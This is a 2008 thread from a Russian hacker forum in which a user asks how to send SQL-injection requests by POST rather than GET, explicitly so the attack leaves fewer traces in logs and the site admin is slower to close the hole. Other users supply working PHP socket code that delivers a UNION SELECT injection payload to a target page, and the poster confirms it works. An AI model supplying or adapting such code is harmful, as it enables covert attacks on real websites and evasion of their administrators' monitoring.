Форум АНТИЧАТ - Convert GET => POST?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Convert GET => POST? (https://forum.antichat.xyz/showthread.php?t=76732)

shellz[21h]

10.07.2008 20:16

Convert GET => POST?

Все доброе время суток.
Как можно реализовать на php конвертацию GET'a в POST метод. Нужно это для дампера SQLinj, а то палится гет хорошо в логах и админ быстро закрывает бреш в системе. Если кто подскажет, буду благодарен.

aka PSIH

10.07.2008 20:19

P2GmadGEN (c)madnet ;)

shellz[21h]

10.07.2008 20:23

Благодарю, Респект тебе и Маднету :)

shellz[21h]

12.07.2008 00:54

PHP код:


		
			
<?php

$fsoc = fsockopen("site.com", 80);



$req  = "POST /bag.asp HTTP/1.0\r\n";

$req  .= "Connection: keep-alive\r\n";

$req  .= "Content-Length: 45\r\n";

$req  .= "Content-Type: text/html\r\n";

$req  .= "Host: site.com\r\n";

$req  .= "User-Agent: Opera/9.24 (Windows NT 5.1; U; eng)\r\n";

$req  .= "\r\n";

$req  .= "page=-11+union+select+1,2,3--\r\n";





fwrite($fsoc, $req );



while (!feof($fsoc))

    echo fread($fsoc,102400);



fclose($fsoc);

?>

Данный код, работает не корректно. Выводит страницу с ошибкой, но результат инъекции не выводит, в чем ошибка?

mr.The

12.07.2008 02:06

Цитата:

$req .= "Content-Length: 45\r\n";

cc чего ты взял что тут

Цитата:

page=-11+union+select+1,2,3--

45 символов?

shellz[21h]

12.07.2008 03:25

Цитата:

cc чего ты взял что тут
45 символов?

нет, это я примеру написал. Может ктонить привести аналогичный код, но только чтоб работал.

c411k

12.07.2008 04:33

PHP код:


		
			
<?php

$host = 'site.com';

$url = fsockopen($host, 80);

$data_p = "page=-11+union+select+1,2,3--";



$req  = "POST /bag.asp HTTP/1.0\r\n";

$req .= "Host: site.com\r\n";

$req .= "User-Agent: Opera/9.24 (Windows NT 5.1; U; eng)\r\n";

$req .= "Content-Type: application/x-www-form-urlencoded\r\n";

$req .= "Content-Length: ".strlen($data_p)."\r\n";

$req .= "Connection: Close\r\n\r\n";

$req .= $data_p;



fputs($url, $req);

while (!feof($url)) $s[] = fgets($url, 1028);

fclose($url);



print_r($s);

?>

shellz[21h]

12.07.2008 05:06

c411k, спасибо большое, теперь работает на ура! :) вопрос больше не имею.

Время: 21:28